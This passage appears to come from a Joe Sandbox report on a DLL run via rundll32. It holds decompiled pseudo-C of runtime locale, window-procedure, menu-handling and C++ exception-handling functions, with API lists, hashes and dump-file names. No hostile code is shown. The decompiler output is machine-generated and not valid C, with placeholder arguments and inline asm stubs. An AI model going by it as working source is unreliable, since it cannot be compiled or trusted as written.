								_t212 = 0x14;
								memcpy(_v8, 0x1004d788, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E10026850(1, 4);
							_v16 = _t233;
							E100268B3(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t116 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x15, _t14);
								_t118 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x14, _v8 + 0x10);
								_t122 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x16, _v8 + 0x14);
								_t126 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t130 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x18, _v8 + 0x1c);
								_t134 = E10037D5C(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20);
								_t138 = E10037D5C(_t225,  &_v28, 1, _t234, 0x51, _v8 + 0x24);
								_t142 = E10037D5C(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28);
								_t146 = E10037D5C(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29);
								_t150 = E10037D5C(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a);
								_t154 = E10037D5C(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b);
								_t158 = E10037D5C(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c);
								_t162 = E10037D5C(_t225,  &_v28, 0, _t234, 0x57, _v8 + 0x2d);
								_t166 = E10037D5C(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e);
								_t170 = E10037D5C(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f);
								_t174 = E10037D5C(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38);
								_t178 = E10037D5C(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c);
								_t182 = E10037D5C(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40);
								_t186 = E10037D5C(_t225,  &_v28, 2, _t234, 0x17, _v8 + 0x44);
								_t190 = E10037D5C(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48);
								if((E10037D5C(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c) | _t116 | _t118 | _t122 | _t126 | _t130 | _t134 | _t138 | _t142 | _t146 | _t150 | _t154 | _t158 | _t162 | _t166 | _t170 | _t174 | _t178 | _t182 | _t186 | _t190) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t196 =  *_t227;
										if(_t196 == 0) {
											break;
										}
										_t61 = _t196 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t196 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t222 =  *((intOrPtr*)(_t258 + 1));
												 *_t258 = _t222;
												_t258 = _t258 + 1;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E1002EC4B(_v8);
								E100268B3(_v8);
								E100268B3(_v12);
								E100268B3(_v16);
								goto L4;
							}
							E100268B3(_t235);
							E100268B3(_v12);
							L7:
							goto L4;
						}
						E100268B3(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x1004d788;
					L26:
					_t106 =  *(_t209 + 0x84);
					if(_t106 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t106 | 0xffffffff) == 0) {
							E100268B3( *(_t209 + 0x88));
							E100268B3( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

APIs

_free.LIBCMT ref: 1002ED91
_free.LIBCMT ref: 1002EDB5
_free.LIBCMT ref: 1002EDC2
_free.LIBCMT ref: 1002EDE7
_free.LIBCMT ref: 1002EDF4
_free.LIBCMT ref: 1002EDFD
_free.LIBCMT ref: 1002F0D7
_free.LIBCMT ref: 1002F0DF

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1a240f892e8593a50400601262b879b35f34ed492d8f44eebeb0a983b2f9046c
Instruction ID: 8ee7e6e7f1e9dc527fc3b3db97b70811b20268164f27ddc043a2abe035561a2d
Opcode Fuzzy Hash: 1a240f892e8593a50400601262b879b35f34ed492d8f44eebeb0a983b2f9046c
Instruction Fuzzy Hash: C5C14376D40205AFDB20CBA8DC82FEE77F8EF09750F554165FA09FB282D670A9458B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001AC4, Relevance: 18.1, APIs: 12, Instructions: 142
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10001AC4(void* __edx, struct HWND__* _a4, int _a8, unsigned int _a12, unsigned int _a16) {
				signed int _v8;
				struct tagRECT _v24;
				char _v25;
				unsigned int _v32;
				void* __ebp;
				signed int _t21;
				void* _t25;
				long _t29;
				void* _t31;
				void* _t44;
				void* _t51;
				void* _t52;
				struct HBRUSH__* _t55;
				struct HWND__* _t61;
				void* _t62;
				unsigned int _t67;
				struct HMENU__* _t68;
				struct HDC__* _t69;
				unsigned int _t70;
				signed int _t73;
				void* _t77;

				_t66 = __edx;
				_t21 =  *0x1004d054; // 0x940b3682
				_v8 = _t21 ^ _t73;
				_t61 = _a4;
				_t70 = _a16;
				_v32 = _t70;
				_t77 = _a8 - 0x111;
				if(_t77 > 0) {
					_t25 = _a8 - 0x200;
					if(_t25 == 0) {
						_t29 = E100015F8(_t62, _t61, _a12, _t70 & 0x0000ffff, _t70 >> 0x10);
						goto L21;
					} else {
						_t31 = _t25 - 1;
						if(_t31 == 0) {
							_t29 = E1000144D(_t62, __edx, _t61, _a12, _t70 & 0x0000ffff, _t70 >> 0x10);
							goto L21;
						} else {
							if(_t31 == 1) {
								_t29 = E100014BD(_t61, _a12, _t70 & 0x0000ffff, _t70 >> 0x10);
								L21:
							} else {
								goto L17;
							}
						}
					}
				} else {
					if(_t77 == 0) {
						L11:
						_t67 = _a12;
						_v25 = 1;
						_t29 = E1000134B(_t61, _t67 & 0x0000ffff, _t67 >> 0x10, _t70,  &_v25);
						if(_v25 == 0) {
							_push(_t70);
							_push(_t67);
							goto L13;
						}
					} else {
						_t44 = _a8 - 1;
						if(_t44 == 0) {
							_t68 = GetSubMenu(GetMenu(_t61), 1);
							CheckMenuRadioItem(_t68, 0xca, 0xcb, 0xca, 8);
							CheckMenuItem(_t68, 0xcc, 8);
							CheckMenuItem(_t68, 0xcd, 8);
							_t70 = _v32;
							goto L11;
						} else {
							_t51 = _t44 - 1;
							if(_t51 == 0) {
								PostQuitMessage(0);
								goto L7;
							} else {
								_t52 = _t51 - 0xd;
								if(_t52 == 0) {
									_t29 = E1000168B(_t61);
								} else {
									if(_t52 != 5) {
										L17:
										_push(_t70);
										_push(_a12);
										L13:
										_t29 = DefWindowProcA(_t61, _a8, ??, ??);
									} else {
										_t69 = GetDC(_t61);
										_t55 = GetClassLongA(_t61, 0xfffffff6);
										GetClientRect(_t61,  &_v24);
										FillRect(_t69,  &_v24, _t55);
										ReleaseDC(_t61, _t69);
										L7:
										_t29 = 0;
									}
								}
							}
						}
					}
				}
				return E100037EA(_t29, _v8 ^ _t73, _t66);
			}

APIs

GetDC.USER32(?), ref: 10001B10
GetClassLongA.USER32(?,000000F6), ref: 10001B1B
GetClientRect.USER32 ref: 10001B28
FillRect.USER32(00000000,?,00000000), ref: 10001B34
ReleaseDC.USER32(?,00000000), ref: 10001B3C
PostQuitMessage.USER32 ref: 10001B57
GetMenu.USER32 ref: 10001B60
GetSubMenu.USER32 ref: 10001B69
CheckMenuRadioItem.USER32(00000000,000000CA,000000CB,000000CA,00000008), ref: 10001B80
CheckMenuItem.USER32 ref: 10001B94
CheckMenuItem.USER32 ref: 10001B9E
DefWindowProcA.USER32(?,?,?,?), ref: 10001BCE

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$CheckItem$Rect$ClassClientFillLongMessagePostProcQuitRadioReleaseWindow
String ID:
API String ID: 3289233142-0
Opcode ID: fe191d6ca87df1940fad0c56e3fec9642e8807648afcb1238b1305a9262ed2d6
Instruction ID: d4f665b8c9981696cb7546183abca082bb285263bca3685d46a9f30bb4881cd0
Opcode Fuzzy Hash: fe191d6ca87df1940fad0c56e3fec9642e8807648afcb1238b1305a9262ed2d6
Instruction Fuzzy Hash: 7241B2B2A40119BBF710DFB98E84EFF3BACEB05391F414505FA02E61A6D778D9109764

Uniqueness

Uniqueness Score: -1.00%

Function 1000134B, Relevance: 18.1, APIs: 12, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000134B(struct HWND__* _a4, int _a8, char* _a20) {
				signed int _v8;
				struct tagRECT _v24;
				struct HMENU__* _v28;
				void* __ebp;
				signed int _t12;
				char* _t14;
				struct HMENU__* _t19;
				void* _t25;
				struct HMENU__* _t29;
				struct HWND__* _t32;
				void* _t36;
				int _t37;
				RECT* _t38;
				signed int _t39;
				void* _t40;

				_t12 =  *0x1004d054; // 0x940b3682
				_v8 = _t12 ^ _t39;
				_t14 = _a20;
				_t32 = _a4;
				_t37 = _a8;
				_t40 = _t37 - 0xc9;
				if(_t40 == 0) {
					DestroyWindow(_t32);
					L15:
					return E100037EA(0, _v8 ^ _t39, _t36);
				}
				if(_t40 <= 0) {
					L13:
					 *_t14 = 0;
					goto L15;
				}
				if(_t37 <= 0xcb) {
					_t19 = GetSubMenu(GetMenu(_t32), 1);
					_t38 = 0;
					CheckMenuRadioItem(_t19, 0xca, 0xcb, _t37, 0);
					if(_t37 != 0xca) {
						GetClientRect(_t32,  &_v24);
						 *0x1004dbcc = CreateRectRgnIndirect( &_v24);
						goto L15;
					}
					_t25 =  *0x1004dbcc; // 0x0
					if(_t25 != 0) {
						DeleteObject(_t25);
						 *0x1004dbcc = 0;
					}
					L8:
					RedrawWindow(_t32, _t38, _t38, 0x105);
					goto L15;
				}
				if(_t37 > 0xcd) {
					goto L13;
				}
				_t29 = GetSubMenu(GetMenu(_t32), 1);
				_t38 = 0;
				_v28 = _t29;
				if((GetMenuState(_t29, _t37, 0) & 0x00000008) == 0) {
					_push(8);
				} else {
					_push(0);
				}
				CheckMenuItem(_v28, _t37, ??);
				goto L8;
			}

APIs

GetMenu.USER32 ref: 1000138F
GetSubMenu.USER32 ref: 10001398
GetMenuState.USER32(00000000,?,00000000), ref: 100013A6
CheckMenuItem.USER32 ref: 100013B9
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 100013C7
GetMenu.USER32 ref: 100013D0
GetSubMenu.USER32 ref: 100013D9
CheckMenuRadioItem.USER32(00000000,000000CA,000000CB,?,00000000), ref: 100013EE
DeleteObject.GDI32(00000000), ref: 10001406
GetClientRect.USER32 ref: 10001419
CreateRectRgnIndirect.GDI32(?), ref: 10001423
DestroyWindow.USER32 ref: 10001436

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$CheckItemRectWindow$ClientCreateDeleteDestroyIndirectObjectRadioRedrawState
String ID:
API String ID: 2213066218-0
Opcode ID: a7e5d02df13b2adb80e4cd68cb86caf5d6b54ca8aeb4eb4cebfab569da949aeb
Instruction ID: 7486e58d24ad4b75999b07b7e2b9891a1c61c82330dbe42b58659f29cda41840
Opcode Fuzzy Hash: a7e5d02df13b2adb80e4cd68cb86caf5d6b54ca8aeb4eb4cebfab569da949aeb
Instruction Fuzzy Hash: F5215974A01225ABFB10DBA5CEC8E8F7BACEB16781F814015FA02E71A1C7749900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10005DB9, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E10005DB9(signed int __ecx, signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, char _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int* _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				void* _v72;
				char _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v104;
				void _v108;
				intOrPtr* _v116;
				signed char* _v188;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t203;
				void* _t204;
				signed int _t205;
				char _t206;
				signed int _t208;
				signed int _t210;
				signed char* _t211;
				signed int _t212;
				signed int _t213;
				signed int _t217;
				void* _t220;
				signed char* _t223;
				void* _t225;
				void* _t226;
				signed char _t230;
				signed int _t231;
				void* _t233;
				signed int _t234;
				void* _t237;
				void* _t240;
				signed char _t247;
				intOrPtr* _t252;
				void* _t255;
				signed int* _t257;
				signed int _t258;
				intOrPtr _t259;
				signed int _t260;
				void* _t265;
				void* _t270;
				void* _t271;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				intOrPtr _t298;
				signed int _t300;
				signed int _t303;
				signed char* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t308;
				signed char* _t311;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t333;
				void* _t335;
				void* _t337;
				void* _t338;
				void* _t339;
				void* _t340;

				_t303 = __edx;
				_t279 = __ecx;
				_push(_t322);
				_t308 = _a20;
				_v32 = 0;
				_v5 = 0;
				_t203 = E1000D9B3(_a8, _a16, _t308);
				_t338 = _t337 + 0xc;
				_v16 = _t203;
				if(_t203 < 0xffffffff || _t203 >= _t308[1]) {
					L69:
					_t204 = E10012120(_t274, _t279, _t303, _t322);
					asm("int3");
					_t335 = _t338;
					_t339 = _t338 - 0x38;
					_push(_t274);
					_t275 = _v116;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t204;
					} else {
						_push(_t322);
						_push(_t308);
						_t205 = E10005A3D(_t275, _t279, _t303, _t322);
						__eflags =  *(_t205 + 8);
						if( *(_t205 + 8) != 0) {
							__imp__EncodePointer(0);
							_t322 = _t205;
							_t225 = E10005A3D(_t275, _t279, _t303, _t322);
							__eflags =  *((intOrPtr*)(_t225 + 8)) - _t322;
							if( *((intOrPtr*)(_t225 + 8)) != _t322) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t217 = E10004D85(_t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t339 = _t339 + 0x1c;
										__eflags = _t217;
										if(_t217 != 0) {
											L86:
											return _t217;
										}
									}
								}
							}
						}
						_t206 = _a16;
						_v28 = _t206;
						_v24 = 0;
						__eflags =  *(_t206 + 0xc);
						if( *(_t206 + 0xc) > 0) {
							_push(_a24);
							E10004CB7(_t275, _t279, 0, _t322,  &_v44,  &_v28, _a20, _a12, _t206);
							_t305 = _v40;
							_t340 = _t339 + 0x18;
							_t217 = _v44;
							_v20 = _t217;
							_v12 = _t305;
							__eflags = _t305 - _v32;
							if(_t305 >= _v32) {
								goto L86;
							}
							_t281 = _t305 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t220 = memcpy( &_v64,  *((intOrPtr*)( *_t217 + 0x10)) + _t281, _t282 << 2);
								_t340 = _t340 + 0xc;
								__eflags = _v64 - _t220;
								if(_v64 > _t220) {
									goto L85;
								}
								__eflags = _t220 - _v60;
								if(_t220 > _v60) {
									goto L85;
								}
								_t223 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t223[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L83:
									__eflags =  *_t223 & 0x00000040;
									if(( *_t223 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E10005D39(_t305, _t275, _a4, _a8, _a12, _a16, _t223, 0,  &_v64, _a24, _a28);
										_t305 = _v12;
										_t340 = _t340 + 0x30;
									}
									goto L85;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L85;
								}
								goto L83;
								L85:
								_t305 = _t305 + 1;
								_t217 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t305;
								_v16 = _t281;
								__eflags = _t305 - _v32;
							} while (_t305 < _v32);
							goto L86;
						}
						E10012120(_t275, _t279, _t303, _t322);
						asm("int3");
						_push(_t335);
						_t304 = _v188;
						_push(_t275);
						_push(_t322);
						_push(0);
						_t208 = _t304[4];
						__eflags = _t208;
						if(_t208 == 0) {
							L111:
							_t210 = 1;
							__eflags = 1;
						} else {
							_t280 = _t208 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L111;
							} else {
								__eflags =  *_t304 & 0x00000080;
								_t311 = _v0;
								if(( *_t304 & 0x00000080) == 0) {
									L93:
									_t276 = _t311[4];
									_t324 = 0;
									__eflags = _t208 - _t276;
									if(_t208 == _t276) {
										L103:
										__eflags =  *_t311 & 0x00000002;
										if(( *_t311 & 0x00000002) == 0) {
											L105:
											_t211 = _a4;
											__eflags =  *_t211 & 0x00000001;
											if(( *_t211 & 0x00000001) == 0) {
												L107:
												__eflags =  *_t211 & 0x00000002;
												if(( *_t211 & 0x00000002) == 0) {
													L109:
													_t324 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t304 & 0x00000002;
													if(( *_t304 & 0x00000002) != 0) {
														goto L109;
													}
												}
											} else {
												__eflags =  *_t304 & 0x00000001;
												if(( *_t304 & 0x00000001) != 0) {
													goto L107;
												}
											}
										} else {
											__eflags =  *_t304 & 0x00000008;
											if(( *_t304 & 0x00000008) != 0) {
												goto L105;
											}
										}
										_t210 = _t324;
									} else {
										_t187 = _t276 + 8; // 0x6e
										_t212 = _t187;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t212;
											if(_t277 !=  *_t212) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L99:
												_t213 = _t324;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t212 + 1));
												if(_t278 !=  *((intOrPtr*)(_t212 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t212 = _t212 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L99;
													}
												}
											}
											L101:
											__eflags = _t213;
											if(_t213 == 0) {
												goto L103;
											} else {
												_t210 = 0;
											}
											goto L112;
										}
										asm("sbb eax, eax");
										_t213 = _t212 | 0x00000001;
										__eflags = _t213;
										goto L101;
									}
								} else {
									__eflags =  *_t311 & 0x00000010;
									if(( *_t311 & 0x00000010) != 0) {
										goto L111;
									} else {
										goto L93;
									}
								}
							}
						}
						L112:
						return _t210;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						_t322 = 0;
						__eflags = 0;
						goto L24;
					} else {
						_t322 = 0;
						if(_t274[0x1c] != 0) {
							L24:
							_t279 = _a12;
							_v12 = _t279;
							goto L26;
						} else {
							_t226 = E10005A3D(_t274, _t279, _t303, 0);
							if( *((intOrPtr*)(_t226 + 0x10)) == 0) {
								L63:
								return _t226;
							} else {
								_t274 =  *(E10005A3D(_t274, _t279, _t303, 0) + 0x10);
								_t265 = E10005A3D(_t274, _t279, _t303, 0);
								_v32 = 1;
								_v12 =  *((intOrPtr*)(_t265 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t322) {
									goto L69;
								} else {
									if( *((intOrPtr*)(E10005A3D(_t274, _t279, _t303, _t322) + 0x1c)) == _t322) {
										L25:
										_t279 = _v12;
										_t203 = _v16;
										L26:
										_v56 = _t308;
										_v52 = _t322;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L59:
											__eflags = _t308[3] - _t322;
											if(_t308[3] <= _t322) {
												goto L62;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L69;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t203);
													_push(_t308);
													_push(_a16);
													_push(_t279);
													_push(_a8);
													_push(_t274);
													L70();
													_t338 = _t338 + 0x20;
													goto L62;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L59;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L31:
													__eflags = _t308[3] - _t322;
													if(_t308[3] > _t322) {
														_push(_a28);
														E10004CB7(_t274, _t279, _t308, _t322,  &_v72,  &_v56, _t203, _a16, _t308);
														_t303 = _v68;
														_t338 = _t338 + 0x18;
														_t252 = _v72;
														_v48 = _t252;
														_v20 = _t303;
														__eflags = _t303 - _v60;
														if(_t303 < _v60) {
															_t294 = _t303 * 0x14;
															__eflags = _t294;
															_v36 = _t294;
															do {
																_t295 = 5;
																_t255 = memcpy( &_v108,  *((intOrPtr*)( *_t252 + 0x10)) + _t294, _t295 << 2);
																_t338 = _t338 + 0xc;
																__eflags = _v108 - _t255;
																if(_v108 <= _t255) {
																	__eflags = _t255 - _v104;
																	if(_t255 <= _v104) {
																		_t298 = 0;
																		_v24 = 0;
																		__eflags = _v96;
																		if(_v96 != 0) {
																			_t257 =  *(_t274[0x1c] + 0xc);
																			_t306 =  *_t257;
																			_t258 =  &(_t257[1]);
																			__eflags = _t258;
																			_v40 = _t258;
																			_t259 = _v92;
																			_v44 = _t306;
																			_v28 = _t259;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t321 = _v40;
																				_t333 = _t306;
																				__eflags = _t333;
																				if(_t333 <= 0) {
																					goto L42;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t260 =  &_v88;
																						_push( *_t321);
																						_push(_t260);
																						L89();
																						_t338 = _t338 + 0xc;
																						__eflags = _t260;
																						if(_t260 != 0) {
																							break;
																						}
																						_t333 = _t333 - 1;
																						_t321 = _t321 + 4;
																						__eflags = _t333;
																						if(_t333 > 0) {
																							continue;
																						} else {
																							_t298 = _v24;
																							_t259 = _v28;
																							_t306 = _v44;
																							goto L42;
																						}
																						goto L45;
																					}
																					_push(_a24);
																					_v5 = 1;
																					_push(_v32);
																					E10005D39(_t306, _t274, _a8, _v12, _a16, _a20,  &_v88,  *_t321,  &_v108, _a28, _a32);
																					_t338 = _t338 + 0x30;
																				}
																				L45:
																				_t303 = _v20;
																				goto L46;
																				L42:
																				_t298 = _t298 + 1;
																				_t259 = _t259 + 0x10;
																				_v24 = _t298;
																				_v28 = _t259;
																				__eflags = _t298 - _v96;
																			} while (_t298 != _v96);
																			goto L45;
																		}
																	}
																}
																L46:
																_t303 = _t303 + 1;
																_t252 = _v48;
																_t294 = _v36 + 0x14;
																_v20 = _t303;
																_v36 = _t294;
																__eflags = _t303 - _v60;
															} while (_t303 < _v60);
															_t308 = _a20;
															_t322 = 0;
															__eflags = 0;
														}
													}
													__eflags = _a24;
													if(_a24 != 0) {
														_push(1);
														E1000544E();
														_t279 = _t274;
													}
													__eflags = _v5;
													if(_v5 != 0) {
														L62:
														_t226 = E10005A3D(_t274, _t279, _t303, _t322);
														__eflags =  *((intOrPtr*)(_t226 + 0x1c)) - _t322;
														if( *((intOrPtr*)(_t226 + 0x1c)) != _t322) {
															goto L69;
														} else {
															goto L63;
														}
													} else {
														__eflags = ( *_t308 & 0x1fffffff) - 0x19930521;
														if(( *_t308 & 0x1fffffff) < 0x19930521) {
															goto L62;
														} else {
															__eflags = _t308[7];
															if(_t308[7] != 0) {
																L55:
																_t230 = _t308[8] >> 2;
																__eflags = _t230 & 0x00000001;
																if((_t230 & 0x00000001) == 0) {
																	_push(_t308[7]);
																	_t231 = E100068F0(_t274);
																	_pop(_t279);
																	__eflags = _t231;
																	if(_t231 == 0) {
																		goto L66;
																	} else {
																		goto L62;
																	}
																} else {
																	 *(E10005A3D(_t274, _t279, _t303, _t322) + 0x10) = _t274;
																	_t240 = E10005A3D(_t274, _t279, _t303, _t322);
																	_t290 = _v12;
																	 *((intOrPtr*)(_t240 + 0x14)) = _v12;
																	goto L64;
																}
															} else {
																_t247 = _t308[8] >> 2;
																__eflags = _t247 & 0x00000001;
																if((_t247 & 0x00000001) == 0) {
																	goto L62;
																} else {
																	__eflags = _a28;
																	if(_a28 != 0) {
																		goto L62;
																	} else {
																		goto L55;
																	}
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L31;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L59;
														} else {
															goto L31;
														}
													}
												}
											}
										}
									} else {
										_v20 =  *((intOrPtr*)(E10005A3D(_t274, _t279, _t303, _t322) + 0x1c));
										_t270 = E10005A3D(_t274, _t279, _t303, _t322);
										_push(_v20);
										 *(_t270 + 0x1c) = _t322;
										_t271 = E100068F0(_t274);
										_pop(_t290);
										if(_t271 != 0) {
											goto L25;
										} else {
											_t308 = _v20;
											_t359 =  *_t308 - _t322;
											if( *_t308 <= _t322) {
												L64:
												E1001200F(_t274, _t290, _t303, __eflags);
											} else {
												_t300 = _t322;
												_v20 = _t322;
												while(E100064CB( *((intOrPtr*)(_t300 + _t308[1] + 4)), _t359, 0x1004da94) == 0) {
													_t322 = _t322 + 1;
													_t290 = _v20 + 0x10;
													_v20 = _v20 + 0x10;
													_t359 = _t322 -  *_t308;
													if(_t322 >=  *_t308) {
														goto L64;
													} else {
														continue;
													}
													goto L65;
												}
											}
											L65:
											_push(1);
											_push(_t274);
											E1000544E();
											_t279 =  &_v68;
											E1000647B( &_v68);
											E10004C0B( &_v68, 0x1004b054);
											L66:
											 *(E10005A3D(_t274, _t279, _t303, _t322) + 0x10) = _t274;
											_t233 = E10005A3D(_t274, _t279, _t303, _t322);
											_t279 = _v12;
											 *(_t233 + 0x14) = _v12;
											_t234 = _a32;
											__eflags = _t234;
											if(_t234 == 0) {
												_t234 = _a8;
											}
											E10004E9B(_t279, _t234, _t274);
											E100067E5(_a8, _a16, _t308);
											_t237 = E10006A10(_t308);
											_t338 = _t338 + 0x10;
											_push(_t237);
											E1000675C(_t274, _t279, _t303, _t308, _t322, __eflags);
											goto L69;
										}
									}
								}
							}
						}
					}
				}
			}

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 10005EB4
type_info::operator==.LIBVCRUNTIME ref: 10005EDB
___TypeMatch.LIBVCRUNTIME ref: 10005FE7
IsInExceptionSpec.LIBVCRUNTIME ref: 100060C2
_UnwindNestedFrames.LIBCMT ref: 10006149
CallUnexpected.LIBVCRUNTIME ref: 10006164

Strings

csm, xrefs: 10005F12
csm, xrefs: 10005DF4
csm, xrefs: 10005E61

Memory Dump Source

